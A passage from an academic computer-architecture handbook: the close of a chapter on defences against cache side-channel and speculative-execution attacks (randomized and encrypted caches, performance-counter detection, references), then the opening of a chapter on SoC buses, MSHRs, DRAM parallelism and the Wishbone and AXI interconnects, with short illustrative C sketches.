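 * sets must be invalidated, which randomizes observable interference. */
void remap(struct rpcache *c, unsigned s1, unsigned s2) {
    uint8_t tmp = c->perm[s1];
    c->perm[s1] = c->perm[s2];
    c->perm[s2] = tmp;
    /* invalidate_set(c, s1); invalidate_set(c, s2);   (hypothetical) */
}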
A further advancement of randomized cache architectures is designs that encrypt
the mapping of addresses to cache sets. CEASER incorporates a block cipher (Qureshi
2018, 2019) for performing the encryption. The encryption key is periodically
changed to obtain a different mapping for the cache sets. An important aspect of
this design is the encryption algorithm, since it lies in the critical path and influences
the time for load and store operations. While traditional ciphers have considerable
latencies, ciphers designed specifically for this purpose may not provide sufficiently
strong encryption (Bodduna et al. 2020).
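The structure of such a design can be sketched as follows; the 4-round toy Feistel network merely stands in for CEASER's low-latency cipher and is not cryptographically meaningful, and the re-keying policy is illustrative.

#include <stdint.h>

#define SETS 1024                      /* illustrative cache size */

static uint32_t toy_cipher(uint32_t block, uint64_t key) {
    uint16_t l = block >> 16, r = block & 0xffff;
    for (int round = 0; round < 4; round++) {   /* toy Feistel rounds */
        uint16_t f = (uint16_t)((r * 0x9e37u) ^ (key >> (16 * round)));
        uint16_t t = (uint16_t)(l ^ f);
        l = r;
        r = t;
    }
    return ((uint32_t)l << 16) | r;
}

/* Set index = encrypted line address; changing epoch_key periodically
 * remaps lines to new sets, defeating slowly built eviction sets. */
unsigned encrypted_set(uint64_t line_addr, uint64_t epoch_key) {
    return toy_cipher((uint32_t)line_addr, epoch_key) % SETS;
}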
Detection-Based Countermeasures
Detection-based countermeasures do not disable any micro-architectural feature.
Instead, they monitor the run-time characteristics of executing programs, typically
through hardware performance counters, to identify behavior patterns that can be
attributed to an ongoing attack (see the detection-based entries in Table 2).
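As an example of the measurement layer such detectors build on, the following is a minimal Linux sketch that samples cache misses for a monitored process via perf_event_open; the fixed threshold is purely illustrative, and real detectors feed such samples into a trained classifier instead.

#include <linux/perf_event.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <stdio.h>

int watch(pid_t pid) {
    struct perf_event_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.size = sizeof(attr);
    attr.type = PERF_TYPE_HARDWARE;
    attr.config = PERF_COUNT_HW_CACHE_MISSES;
    attr.disabled = 1;

    int fd = (int)syscall(SYS_perf_event_open, &attr, pid, -1, -1, 0);
    if (fd < 0) return -1;
    ioctl(fd, PERF_EVENT_IOC_RESET, 0);
    ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);
    for (;;) {
        uint64_t misses = 0;
        sleep(1);                             /* 1-second sampling period */
        if (read(fd, &misses, sizeof(misses)) != sizeof(misses)) break;
        if (misses > 1000000)                 /* illustrative threshold */
            printf("suspicious cache-miss rate: %llu/s\n",
                   (unsigned long long)misses);
        ioctl(fd, PERF_EVENT_IOC_RESET, 0);
    }
    return 0;
}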
Conclusions
The last few years have seen several variants of transient micro-architectural attacks.
The root cause of all these attacks is the unintended influence of speculatively
executed operations on the hardware state. Given the complexity of modern micropro-
cessors, many new variants are likely to be discovered in the future. Next-generation
microprocessors should be designed to not just prevent known attacks but should
be resilient to future attacks as well. This would require security-aware design
methodologies that involve the following.
• While there have been several countermeasures proposed, most have been
evaluated in an ad hoc manner. This makes it difficult to quantitatively compare
countermeasures and gauge their effectiveness. There is an urgent need to
standardize evaluation for security in microprocessors. These standards would
provide methodologies to gauge the isolation between software entities, for
example, a methodology that can quantify how well the OS is isolated from
user applications.
References
Ainsworth S, Jones TM (2020) Muontrap: preventing cross-domain spectre-like attacks by
capturing speculative state. In: 47th ACM/IEEE annual international symposium on computer
architecture, ISCA 2020, Valencia, 30 May–3 June 2020. IEEE, pp 132–144
Alam M, Bhattacharya S, Mukhopadhyay D (2021) Victims can be saviors: a machine learning–
based detection for micro-architectural side-channel attacks. J Emerg Technol Comput Syst
17(2):1–31
Barber K, Bacha A, Zhou L, Zhang Y, Teodorescu R (2019) Specshield: shielding speculative
data from microarchitectural covert channels. In: 28th international conference on parallel
architectures and compilation techniques, PACT 2019, Seattle, 23–26 Sept 2019. IEEE, pp. 151–
164
Barresi A, Razavi K, Payer M, Gross TR (2015) CAIN: silently breaking ASLR in the cloud.
In: 9th USENIX workshop on offensive technologies, WOOT’15, Washington, DC, 10–11 Aug
2015
Bernstein DJ (2005) Cache-timing Attacks on AES
Bhatkar S, DuVarney DC, Sekar R (2003) Address obfuscation: an efficient approach to combat
a broad range of memory error exploits. In: Proceedings of the 12th USENIX security
symposium, Washington, DC, 4–8 Aug 2003. USENIX Association
Bhattacharyya A, Sandulescu A, Neugschwandtner M, Sorniotti A, Falsafi B, Payer M, Kurmus
A (2019) Smotherspectre: exploiting speculative execution through port contention. In:
Cavallaro L, Kinder J, Wang XF, Katz J (eds) Proceedings of the 2019 ACM SIGSAC
conference on computer and communications security, CCS 2019, London, 11–15 Nov 2019.
ACM, pp 785–800
Bodduna R, Ganesan V, SLPSK P, Veezhinathan K, Rebeiro C (2020) Brutus: refuting the security
claims of the cache timing randomization countermeasure proposed in ceaser. IEEE Comput
Archit Lett 19(1):9–12
Bourgeat T, Lebedev I, Wright A, Zhang S, Arvind, Devadas S (2019) Mi6: secure enclaves in a
speculative out-of-order processor. In: Proceedings of the 52nd annual IEEE/ACM international
symposium on microarchitecture, MICRO’52, New York. Association for Computing Machin-
ery, pp 42–56
Briongos S, Irazoqui G, Malagón P, Eisenbarth T (2018) Cacheshield: detecting cache attacks
through self-observation. In: Zhao Z, Ahn G-J, Krishnan R, Ghinita G (eds) Proceedings of the
eighth ACM conference on data and application security and privacy, CODASPY 2018, Tempe,
19–21 Mar 2018. ACM, pp 224–235
Bulck JV, Minkin M, Weisse O, Genkin D, Kasikci B, Piessens F, Silberstein M, Wenisch TF,
Yarom Y, Strackx R (2018) Foreshadow: extracting the keys to the intel SGX kingdom with
transient out-of-order execution. In: Enck W, Felt AP (eds) 27th USENIX security symposium,
USENIX security 2018, Baltimore, 15–17 Aug 2018. USENIX Association, pp 991–1008
Bulck JV, Moghimi D, Schwarz M, Lipp M, Minkin M, Genkin D, Yarom Y, Sunar B, Gruss D,
Piessens F (2020) LVI: hijacking transient execution through microarchitectural load value
injection. In: 2020 IEEE symposium on security and privacy, SP 2020, San Francisco, 18–21
May 2020. IEEE, pp 54–72
Canella C, Genkin D, Giner L, Gruss D, Lipp M, Minkin M, Moghimi D, Piessens F, Schwarz
M, Sunar B, Bulck JV, Yarom Y (2019) Fallout: leaking data on meltdown-resistant cpus.
In: Cavallaro L, Kinder J, Wang XF, Katz J (eds) Proceedings of the 2019 ACM SIGSAC
conference on computer and communications security, CCS 2019, London, 11–15 Nov 2019.
ACM, pp 769–784
Chen G, Chen S, Xiao Y, Zhang Y, Lin Z, Lai T-H (2020) Sgxpectre: stealing intel secrets from
SGX enclaves via speculative execution. IEEE Secur Priv 18(3):28–37
Chiappetta M, Savas E, Yilmaz C (2016) Real time detection of cache-based side-channel attacks
using hardware performance counters. Appl Softw Comput 49(C):1162–1174
Delshadtehrani L, Canakci S, Zhou B, Eldridge S, Joshi A, Egele M (2020) Phmon: a
programmable hardware monitor and its security use cases. In: Capkun S, Roesner F (eds) 29th
USENIX security symposium, USENIX security 2020, 12–14 Aug 2020. USENIX Association,
pp 807–824
Demme J, Maycock M, Schmitz J, Tang A, Waksman A, Sethumadhavan S, Stolfo S (2013) On the
feasibility of online malware detection with performance counters. In: Proceedings of the 40th
annual international symposium on computer architecture, ISCA’13, New York. Association for
Computing Machinery, pp 559–570
Dhavlle A, Mehta R, Rafatirad S, Homayoun H, Dinakarrao SMP (2020) Entropy-shield: side-
channel entropy maximization for timing-based side-channel attacks. In: 21st international
symposium on quality electronic design, ISQED 2020, Santa Clara, 25–26 Mar 2020. IEEE,
pp 161–166
Domnitser L, Jaleel A, Loew J, Abu-Ghazaleh NB, Ponomarev D (2012) Non-monopolizable
caches: low-complexity mitigation of cache side-channel attacks. TACO 8(4):35
Fustos J, Farshchi F, Yun H (2019) Spectreguard: an efficient data-centric defense mechanism
against spectre attacks. In: Proceedings of the 56th annual design automation conference 2019,
DAC 2019, Las Vegas, 02–06 June 2019. ACM, p 61
Gonzalez A, Korpan B, Zhao J, Younis E (2018) Spectrum: classifying, replicating and mitigating
spectre attacks on a speculating RISC-V microarchitecture. https://people.eecs.berkeley.edu/~
kubitron/courses/cs262a-F18/projects/reports/project4_report.pdf. Accessed: 4 Apr 2021
Gras B, Razavi K, Bosman E, Bos H, Giuffrida C (2017) ASLR on the line: practical cache attacks
on the MMU. In: 24th annual network and distributed system security symposium, NDSS 2017,
San Diego, 26 Feb–1 Mar 2017
Harris A, Wei S, Sahu P, Kumar P, Austin TM, Tiwari M (2019) Cyclone: detecting contention-
based cache information leaks through cyclic interference. In: Proceedings of the 52nd annual
IEEE/ACM international symposium on microarchitecture, MICRO 2019, Columbus, 12–16
Oct 2019. ACM, pp 57–72
Hund R, Willems C, Holz T (2013) Practical timing side channel attacks against kernel space
ASLR. In: Proceedings of the 2013 IEEE symposium on security and privacy, SP’13. IEEE
Computer Society, pp 191–205
Institute of Applied Information Processing and Communications (IAIK). Meltdown Proof-of-
Concept. https://github.com/IAIK/meltdown. Accessed: 2 Mar 2021
Institute of Applied Information Processing and Communications (IAIK). ZombieLoad PoC.
https://github.com/IAIK/ZombieLoad. Accessed: 2 Mar 2021
Intel. Intel C++ Compiler Classic Developer Guide and Reference. https://software.intel.com/
content/dam/develop/external/documents/cpp_compiler_classic.pdf. Accessed: 3 Feb 2021
Intel Corporation (2021) 11th Generation Intel Core Processor Desktop Datasheet, Volume 1,
Revision 003. https://cdrdv2.intel.com/v1/dl/getContent/634648. Accessed: 2 June 2022
Intel Corporation (2022) 12th Generation Intel Core Processor Desktop Datasheet, Volume 1,
Revision 004. https://cdrdv2.intel.com/v1/dl/getContent/655258. Accessed: 2 June 2022
Khasawneh KN, Koruyeh EM, Song C, Evtyushkin D, Ponomarev D, Abu-Ghazaleh N (2019)
Safespec: banishing the spectre of a meltdown with leakage-free speculation. In: Proceedings
of the 56th annual design automation conference 2019, DAC’19, New York. Association for
Computing Machinery
Kiriansky V, Lebedev IA, Amarasinghe SP, Devadas S, Emer JS (2018) DAWG: a defense
against cache timing attacks in speculative execution processors. In: 51st annual IEEE/ACM
international symposium on microarchitecture, MICRO 2018, Fukuoka, 20–24 Oct 2018. IEEE
Computer Society, pp 974–987
Kocher P, Horn J, Fogh A, Genkin D, Gruss D, Haas W, Hamburg M, Lipp M, Mangard S, Prescher
T, Schwarz M, Yarom Y (2019) Spectre attacks: exploiting speculative execution. In: 2019
IEEE symposium on security and privacy, SP 2019, San Francisco, 19–23 May 2019. IEEE,
pp 1–19
Koruyeh EM, Khasawneh KN, Song C, Abu-Ghazaleh NB (2018) Spectre returns! speculation
attacks using the return stack buffer. In: Rossow C, Younan Y (eds) 12th USENIX workshop
on offensive technologies, WOOT 2018, Baltimore, 13–14 Aug 2018. USENIX Association
Koruyeh EM, Shirazi SHA, Khasawneh KN, Song C, Abu-Ghazaleh NB (2020) Speccfi: mitigating
spectre attacks using CFI informed speculation. In: 2020 IEEE symposium on security and
privacy, SP 2020, San Francisco, 18–21 May 2020. IEEE, pp 39–53
Li C, Gaudiot J-L (2019) Detecting malicious attacks exploiting hardware vulnerabilities using
performance counters. In: Getov V, Gaudiot J-L, Yamai N, Cimato S, Chang JM, Teranishi Y,
Yang J-J, Leong HV, Shahriar H, Takemoto M, Towey D, Takakura H, Elçi A, Takeuchi S, Puri
S (eds) 43rd IEEE annual computer software and applications conference, COMPSAC 2019,
Milwaukee, 15–19 July 2019, vol 1. IEEE, pp 588–597
Lipp M, Schwarz M, Gruss D, Prescher T, Haas W, Fogh A, Horn J, Mangard S, Kocher P, Genkin
D, Yarom Y, Hamburg M (2018) Meltdown: reading kernel memory from user space. In: Enck
W, Felt AP (eds) 27th USENIX security symposium, USENIX security 2018, Baltimore, 15–17
Aug 2018. USENIX Association, pp 973–990
Liu F, Lee RB (2014) Random fill cache architecture. In: 47th annual IEEE/ACM international
symposium on microarchitecture, MICRO 2014, Cambridge, 13–17 Dec 2014. IEEE Computer
Society, pp 203–215
Liu F, Wu H, Mai K, Lee RB (2016) Newcache: secure cache architecture thwarting cache side-
channel attacks. IEEE Micro 36(5):8–16
Maisuradze G, Rossow C (2018) ret2spec: speculative execution using return stack buffers. In: Lie
D, Mannan M, Backes M, Wang XF (eds) Proceedings of the 2018 ACM SIGSAC conference on
computer and communications security, CCS 2018, Toronto, 15–19 Oct 2018. ACM, pp 2109–
2122
Wang Z, Lee RB (2007) New cache designs for thwarting software cache-based side channel
attacks. In: Tullsen DM, Calder B (eds) ISCA. ACM, pp 494–505
Wang G, Chattopadhyay S, Gotovchits I, Mitra T, Roychoudhury A (2018) oo7: low-overhead
defense against spectre attacks via binary analysis. ArXiv, abs/1807.05843
Wang Y, Ferraiuolo A, Zhang D, Myers AC, Edward Suh G (2016) SecDCP: secure dynamic cache
partitioning for efficient timing channel protection. In: Proceedings of the 53rd annual design
automation conference, DAC 2016, Austin, 5–9 June 2016. ACM, pp 74:1–74:6
Weisse O, Van Bulck J, Minkin M, Genkin D, Kasikci B, Piessens F, Silberstein M, Strackx R,
Wenisch TF, Yarom Y (2018) Foreshadow-NG: breaking the virtual memory abstraction with
transient out-of-order execution. Technical report
Weisse O, Neal I, Loughlin K, Wenisch TF, Kasikci B (2019) NDA: preventing speculative
execution attacks at their source. In: Proceedings of the 52nd annual IEEE/ACM international
symposium on microarchitecture, MICRO’52, New York. Association for Computing Machin-
ery, pp 572–586
Werner M, Unterluggauer T, Giner L, Schwarz M, Gruss D, Mangard S (2019) Scattercache:
thwarting cache attacks via cache set randomization. In: Heninger N, Traynor P (eds) 28th
USENIX security symposium, USENIX security 2019, Santa Clara, 14–16 Aug 2019. USENIX
Association, pp 675–692
Wu Y, Qian X (2020) Reversispec: reversible coherence protocol for defending transient attacks.
CoRR, abs/2006.16535
Xu J, Kalbarczyk Z, Iyer RK (2003) Transparent runtime randomization for security. In:
22nd symposium on reliable distributed systems (SRDS 2003), Florence, 6–8 Oct 2003. IEEE
Computer Society, p 260
Yan M, Choi J, Skarlatos D, Morrison A, Fletcher CW, Torrellas J (2019) Invisispec: making spec-
ulative execution invisible in the cache hierarchy (corrigendum). In: Proceedings of the 52nd
annual IEEE/ACM international symposium on microarchitecture, MICRO 2019, Columbus,
12–16 Oct 2019. ACM, p 1076
Zhang T, Zhang Y, Lee RB (2016) Cloudradar: a real-time side-channel attack detection system in
clouds. In: Monrose F, Dacier M, Blanc G, García-Alfaro J (eds) Research in attacks, intrusions,
and defenses – 19th international symposium, RAID 2016, Paris, 19–21 Sept 2016, Proceedings.
Lecture notes in computer science, vol 9854. Springer, pp 118–140
Zhao ZN, Ji H, Yan M, Yu J, Fletcher CW, Morrison A, Marinov D, Torrellas J (2020)
Speculation invariance (invarspec): faster safe execution through program analysis. In: 53rd
annual IEEE/ACM international symposium on microarchitecture, MICRO 2020, Athens, 17–
21 Oct 2020. IEEE, pp 1138–1152
Bus and Memory Architectures
6
Trevor E. Carlson
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 202
SoC Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 202
Processor Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203
Accelerators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 208
On-Chip Connectivity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
Interconnect Interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
Interconnect Topologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Off-Chip Connectivity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Summary and Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
T. E. Carlson ()
Department of Computer Science, National University of Singapore, Singapore, Singapore
e-mail: [email protected]
Introduction
Systems-on-Chip (SoCs) are the heart of many digital devices today. From mobile
phones to TVs and smart watches to datacenter servers, most are made up of a vari-
ety of processors and accelerators connected through a variety of interconnection
networks.
Connectivity is the heart of any SoC built today. These systems tend to require a
collection of specialized components to handle different tasks, from external device
connectivity (like display controllers, networking, and device controllers), as well
as internal computation, storage, and communication (such as between compute
units like CPUs (Central Processing Units), GPUs (Graphics Processing Units), and
various other accelerators and internal controllers in a system). But, in addition to
simple communication, there can also be isolation mechanisms for both security
(ARM TrustZone ARM 2024) and performance (Bus isolation).
CPU cores, accelerators, and other peripherals of a system do not stand
alone but require interaction with the other components of the system. Interestingly,
one of the principles of optimizing circuits, architectures, and systems has been
to reduce waste through reuse. While one can duplicate an entire processor or even a
component of that processor, there is an opportunity to optimize the system by
time-multiplexing the use of those resources. This is one example of how to reduce the
amount of silicon area, power, and energy used by a system. By optimizing the
system on multiple levels, from the transistor design up to the workloads that run on
the processors, it is possible to build a system that is affordable, long-running,
and efficient.
It is these very trade-offs that this chapter explores. It discusses some
fundamental aspects of processor design and latency-hiding methods (where the
processors themselves can handle any delay caused by trade-offs made at design
time). In addition to a high-level overview of the processors themselves, it takes
a deep dive into SoC interconnects. The goal is to better understand how to connect
various subsystems together.
SoC Overview
Today’s processor designs consist of a large number of components, from the core
CPU itself to accelerators like GPUs, NPUs, and various other designs. Many
systems, especially embedded or power-constrained systems, build in workload-
specific accelerators in ASIC form that can be used to accelerate data processing.
In fact, many modern processors have been projected to contain more than 40
individual accelerators helping with a variety of tasks from decompressing audio
to compressing movies for local storage (Shao and Wang 2019).
A number of main components connect to the system itself. On-chip networks are
used to connect these components to one another. The choice of interconnect depends
on the connectivity requirements of the components involved; Table 1 lists the common
digital components found in modern SoCs.
Table 1 Common digital components found in modern System-on-Chip (SoC) systems

Component | Type | Description
CPU | Compute | Latency- and branch-heavy processing
GPGPU | Compute | Throughput processing on GPUs, image processing
NPU (Neural Processing Unit) | Compute | AI-specific acceleration
*PU (accelerators) | Compute | Fixed-function accelerators, like audio and video encoders and decoders
(Hierarchical) bus interconnects | Communication | One-to-all communication
Network-on-chip | Communication | Flexible communication
On-chip memory (scratchpads) and caches | Cache hierarchy | Provides improved average latency by taking into account spatial and temporal locality
DDR interface | Off-chip communication | Off-chip DRAM communication
Peripheral interfaces | Off-chip communication | Various interfaces like HDMI, USB, and Ethernet
Processor Overview
CPU Types
There are a variety of CPU types (see Table 2), as mentioned in the
previous section. Each processor type comes with trade-offs in performance,
area, power, and energy efficiency, and also results in differences in development,
validation, and verification time.
For extremely low-power and low-energy designs, in-order processors are typi-
cally used to control the system in an extremely lightweight way. These processors
tend to be quite small and vary in size from the extremely small nW-scale to larger
mW-scale processor designs like the ARM Cortex-A520.
Table 2 A list of popular CPU types by category. Higher performance designs tend to be less
efficient, while restricted out-of-order machines tend to be the most energy-efficient overall
(although they are still limited in performance compared to purely out-of-order processors).
In modern systems, from ARM’s big.LITTLE to Intel’s Efficiency and Performance cores, the
complexity and efficiency of out-of-order processors can vary significantly
Processor type Efficiency Performance
In-order
Restricted out-of-order (slice-order)
Out-of-order
On the low end, processors tend to prioritize energy efficiency or area, which
relate to power supply requirements or costs, respectively. For example, energy-
harvesting devices that use solar power, or even electromagnetic, thermal, or
vibrational energy, have very strict power and energy requirements and prioritize
these requirements over others.
As performance becomes a concern, systems tend to focus on energy efficiency
and dark-silicon-compatible (Esmaeilzadeh et al. 2011) techniques to make the best
use of the available power budget given physical device limits. Due to
the end of Dennard Scaling (Dennard et al. 1974), the additional transistors that
could typically be used for additional compute can no longer be enabled or turned on
simultaneously. This has led to the need for multicore processor designs and DVFS
techniques like Intel's Turbo Boost that can allow a single core to use a larger
percentage of the overall power budget of the chip.
But, in the quest to deploy systems with continued performance improvement,
CPU designers have looked to a number of performance techniques, including
memory-level parallelism (MLP) (Glew 1998) and additional speculation in the processors in general.
Balanced Processor Architectures
By analytically balancing the sizes of the processor's structures (Karkhanis
and Smith 2007), the architect can design a system that, for the most important
workloads, will not see any one structure or hardware component become the
limiting factor of the system. By building a balanced microarchitecture, the resulting
CPU will allow for high performance but will also not unnecessarily waste silicon
area and energy for unneeded structures. By building balanced processor microar-
chitecture, the design can meet high performance requirements while maintaining
efficiency.
MSHRs
Miss-status holding registers (MSHRs) (Kroft 1981) are an important feature of
caches that allow each outstanding miss to be paired with its destination location. While the
cache is waiting for the data to return, a pointer to the storage location is held in the
MSHR. Once the data returns, the cache can look up the target destination (e.g., for
an L1 data cache, the destination will be a register entry in the CPU) and direct the
data to be stored there. Finally, the CPU uses this response as an action to eventually
issue instructions that have all of their operands ready.
Beyond the L1 data cache, all caches that support a number of outstanding
misses use MSHRs, including instruction caches and the caches contained in the
cache hierarchy (where modern processors can have many layers of caching, ending
with the LLC, or last-level cache that will finally communicate with off-chip
memory via the memory controller to request the data needed).
For a balanced CPU microarchitecture (see section “Balanced Processor Archi-
tectures”), the MSHRs are sized appropriately for the system design at hand. For
example, high-end in-order and low-end out-of-order processors might only have
four MSHR entries in their L1 data caches. As these processors do not expose a
significant amount of parallelism, a small number of MSHRs is adequate for most
applications. High-end out-of-order processors, however, can expose a
significant amount of parallelism and tend to require 20 or more MSHRs per core.
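A minimal C model of an MSHR file illustrates the allocate-or-merge logic on a miss; entry counts and field names are illustrative.

#include <stdint.h>

#define N_MSHR    4       /* typical for a small core; 20+ for big OoO cores */
#define N_TARGETS 4       /* loads merged onto the same outstanding line */

struct mshr {
    int      valid;
    uint64_t line_addr;               /* block-aligned miss address */
    int      dest_reg[N_TARGETS];     /* destinations to wake on fill */
    int      n_dest;
};

/* On a miss: merge into a matching entry or allocate a new one.
 * Returns 0 if the MSHR file is full, i.e., a structural stall. */
int mshr_allocate(struct mshr file[N_MSHR], uint64_t line, int dest) {
    int free_slot = -1;
    for (int i = 0; i < N_MSHR; i++) {
        if (file[i].valid && file[i].line_addr == line) {
            if (file[i].n_dest == N_TARGETS) return 0;
            file[i].dest_reg[file[i].n_dest++] = dest;   /* merge */
            return 1;
        }
        if (!file[i].valid) free_slot = i;
    }
    if (free_slot < 0) return 0;      /* no free MSHR: stall the pipeline */
    file[free_slot] = (struct mshr){ .valid = 1, .line_addr = line,
                                     .dest_reg = { dest }, .n_dest = 1 };
    return 1;
}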
Memory-hierarchy parallelism (MHP) refers to the overlapping of multiple
outstanding accesses within the cache hierarchy. Many in-order and restricted out-of-order processors are unable to hide
the latencies imposed by the cache hierarchy, leading to additional processor stalls
that are not seen on the larger, more complex, and less efficient designs. Improving
MHP for these lightweight processors can help increase throughput due to the
overlapping nature of the accesses to on-chip caches (Carlson et al. 2015).
Parallelism to DRAM
Being able to access off-chip memory in a fast, high-bandwidth manner is key
for processors to be able to sustain high performance. The DRAM subsystem is
optimized for high-bandwidth workloads that access data in a
sequential manner. The DRAM structures are designed to hide the
DRAM page-activation latency and allow continuous streaming of data from
contiguous memory addresses. As data is streamed, a sufficiently fast CPU will be
able to transfer data at the maximum DRAM rate, which on modern machines
can exceed 250 GiB/s.
MLP is enabled by the ability of the DRAM subsystem to service accesses to
different parts of the DRAM chips concurrently. To support this, DRAM is composed of
banks that can handle independent requests for data. If that data is distributed across
the DRAM subsystem, then there is a high chance that data accesses will need data
from an unused bank. As this bank can access data independently from other banks,
the accesses that do not arrive on the same bank can exhibit MLP.
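A simple bank-interleaved address mapping makes this concrete; the field widths below are illustrative and do not correspond to a specific memory controller.

#include <stdint.h>

#define LINE_BITS 6       /* 64-byte lines */
#define COL_BITS  7       /* lines per row segment; illustrative */
#define BANK_BITS 4       /* 16 banks */

struct dram_addr { unsigned col, bank, row; };

struct dram_addr map(uint64_t paddr) {
    uint64_t line = paddr >> LINE_BITS;
    struct dram_addr a;
    a.col  = (unsigned)(line & ((1u << COL_BITS) - 1));
    a.bank = (unsigned)((line >> COL_BITS) & ((1u << BANK_BITS) - 1));
    a.row  = (unsigned)(line >> (COL_BITS + BANK_BITS));
    return a;
}
/* Streaming accesses stay within an open row (fast column hits), while
 * requests that fall in different banks can be serviced concurrently,
 * exposing memory-level parallelism. */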
Accelerators
Accelerators make up a huge portion of chips today (Shao and Wang 2019). Orig-
inally, processor designs featured a single CPU core, with basic I/O connectivity
and memory (DRAM) connectivity. But, a number of factors have led to changes
in how processors are designed, including the addition of multiple CPU cores and a
multitude of accelerators.
In recent years, key physical limitations have slowed the continued performance
improvements traditionally seen in CPUs. The issue of Dark
Silicon (Esmaeilzadeh et al. 2011), a consequence of the end of Dennard
Scaling (Dennard et al. 1974), means that only a part of the transistors on a processor can
be used at once.
be used at once. While Moore’s Law (Moore 2006) allowed for a large number
of additional transistors in the same space, the power requirements to use all of
these transistors at the same time were no longer possible. At this point, higher
performance needed to come along with higher efficiency – leading to the broad use
of specialization (in the form of accelerators), as well as more efficient cores (the use
of multicore and manycore processors which swap larger inefficient cores for many
smaller more efficient ones) and the use of new techniques like TurboBoost (Intel
Corporation 2024b) to continue to improve processor performance (TurboBoost,
and similar solutions, increase the operating frequency and power allocation of a single core of a multicore
chip when other cores are not in use, effectively reallocating the power budget to the core
in use).
Acceleration (and specialization) has occurred along many fronts, with fixed-
function accelerators (audio and video encoders are a good example of this)
becoming commonplace in many designs. Off-chip accelerators (like GPUs) were
the first to emerge, but on-chip acceleration quickly became dominant due to the
cost savings and increased bandwidth and lower latencies of on-chip solutions.
Today, mobile phone processor designs combine general-purpose compute
units, such as CPUs and GPUs, with a large number of specialized
accelerators (Shao and Wang 2019). Even CPUs have continued to specialize,
increasing both performance and efficiency with SIMD, security (AES), matrix/DSP
acceleration (AMX), and AI acceleration.
Together, these complex systems have a large number of discrete accelerators
that need to be connected to one another in an efficient way. The next sections
discuss a number of interconnect methodologies that have been developed to
allow diverse components to be connected in standardized ways.
On-Chip Connectivity
Interconnect Interfaces
One widely used open interconnect standard is Wishbone (Alderman et al. 2010).
The Wishbone interface supports a number of data bit widths (from 8 bits to 64 bits), as well
as multiple initiators (requesting processor) and target (destination) peripherals
that can exist on a single system bus. This bus design not only has support for
bidirectional data transfers across a data bus but also includes optional support for
many signals, like write-enable, or even the data request address. While the typical
usage for an interface like this is to connect a processor to a memory, other uses
like a lightweight, address-less FIFO communication protocol are also supported.
The Wishbone standard also defines a protocol used for communication to initiate
single data transfers, burst data transfers, read–modify–write updates, and a number
of other options. The protocol allows for the ability to request a retry by the target
or even to optionally support returning error results.
While there are a number of other busses that exist today, like the Avalon (Intel
Corporation 2022) bus, one of the most popular interconnect types is the ARM
AMBA family of bus interfaces and protocols (ARM Corporation 2024). These
interfaces are royalty-free to use and come in a large variety of interface types (ARM
Corporation 2024). While the basic functions of bus types like the AXI, or Advanced
eXtensible Interface, bus provide similar functionality to the Wishbone bus, the
signals and protocols differ. But, while the basic version of the AMBA AXI version
5 (Issue K) initiator (Manager in AMBA terminology) requires the use of 17 signals
(apart from the clock and reset signals), the optional functions of AXI5 together
contain more than 100 signals. Wishbone, in comparison, has just ten signals for the
initiator, with more than half being optional. There are a number of advanced options
that are supported by the AXI protocol, such as supporting multiple outstanding
transactions and out-of-order completion of transactions (ARM Corporation 2024).
These are significant enhancements, as exploiting MLP to improve performance
and efficiency requires an interconnect that can support these features. A number
of other interesting features are supported by the AMBA AXI protocol, such as
data channels up to 1024 bits wide, atomic memory transactions, and even security
support and coherence support through the CHI, or Coherent Hub Interface.
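The value of ID-tagged, out-of-order completion can be illustrated with a toy C model of an initiator's transaction table; the structures below are illustrative and are not the AMBA signal set.

#include <stdint.h>

#define MAX_OUTSTANDING 8

struct txn { uint64_t addr; int pending; };

struct initiator { struct txn table[MAX_OUTSTANDING]; };

/* Issue a read: the free slot index serves as the transaction ID that
 * travels with the request. Returns -1 when all IDs are in flight
 * (back-pressure on the requester). */
int issue_read(struct initiator *m, uint64_t addr) {
    for (int id = 0; id < MAX_OUTSTANDING; id++)
        if (!m->table[id].pending) {
            m->table[id].addr = addr;
            m->table[id].pending = 1;
            return id;
        }
    return -1;
}

/* Responses may arrive in any order; the ID matches them back to the
 * request. Keeping several reads in flight is what exposes MLP. */
void on_response(struct initiator *m, int id) {
    m->table[id].pending = 0;
}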
Interconnect Topologies
Off-Chip Connectivity
References
Alderman R, Amitay Y, Cohan D, Delvaux M, Dolenc M, Hetzer V, Homann M, Hurt B, Kirk
L, Lampret D, Peterson WD, Rice B, Rynearson J, Shamli A, Usselmann R, Unnebäck M,
Serrano J, Wlostowski T (2010) Wishbone system-on-chip (SoC) interconnection architecture
for portable IP cores, version B4
ARM (2024) Trustzone for Cortex-A. https://www.arm.com/technologies/trustzone-for-cortex-a
ARM Corporation (2024) Advanced microcontroller bus architecture (AMBA). https://developer.
arm.com/Architectures/AMBA
Carlson TE, Heirman W, Allam O, Kaxiras S, Eeckhout L (2015) The load slice core microarchi-
tecture. In: International symposium on computer architecture (ISCA), pp 272–284
Cho BY, Jung J, Erez M (2021) Accelerating bandwidth-bound deep learning inference with main-
memory accelerators. In: Proceedings of the international conference for high performance
computing, networking, storage and analysis, SC’21. Association for Computing Machinery,
New York
Dennard RH, Gaensslen FH, Yu H, Rideout VL, Bassous E, LeBlanc AR (1974) Design of ion-
